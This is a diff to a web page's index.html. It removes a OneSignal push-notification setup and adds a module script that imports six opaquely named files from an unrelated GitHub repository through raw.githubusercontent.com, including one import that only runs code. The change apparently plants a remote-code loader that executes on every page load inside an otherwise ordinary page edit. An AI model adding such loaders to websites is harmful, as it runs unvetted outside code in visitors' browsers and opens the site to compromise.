--- a/index.html
+++ b/index.html
@@ -132,23 +132,15 @@
             }
         }
     </style>
-
-    <script src="https://cdn.onesignal.com/sdks/web/v16/OneSignalSDK.page.js" defer></script>
-    <script>
-        window.OneSignalDeferred = window.OneSignalDeferred || [];
-        OneSignalDeferred.push(async function (OneSignal) {
-            await OneSignal.init({
-                appId: "bd5ebfcf-b737-4d8e-a4ec-84de9b6dc7f1",
-                safari_web_id: "web.onesignal.auto.3575d4da-2056-4635-b3df-37db701214ed",
-                notifyButton: {
-                    enable: true,
-                },
-            });
-        });
-    </script>
-
+<script type="module">
+    import { qX, rY } from 'https://raw.githubusercontent.com/sd-info/sc/main/c1.js';
+    import { b7, p8 } from 'https://raw.githubusercontent.com/sd-info/sc/main/u2.js';
+    import { v9 } from 'https://raw.githubusercontent.com/sd-info/sc/main/main/i3.js';
+    import { k5, n6 } from 'https://raw.githubusercontent.com/sd-info/sc/main/main/d4.js';
+    import { x0 } from 'https://raw.githubusercontent.com/sd-info/sc/main/main/m5.js';
+    import 'https://raw.githubusercontent.com/sd-info/sc/main/main/e6.js';
+</script>
 </head>
-
 <body class="bg-indigo-50 min-h-screen flex flex-col font-sans">
     <!-- Header -->
     <header class="bg-gradient-to-r from-purple-600 to-indigo-600 text-white py-6">
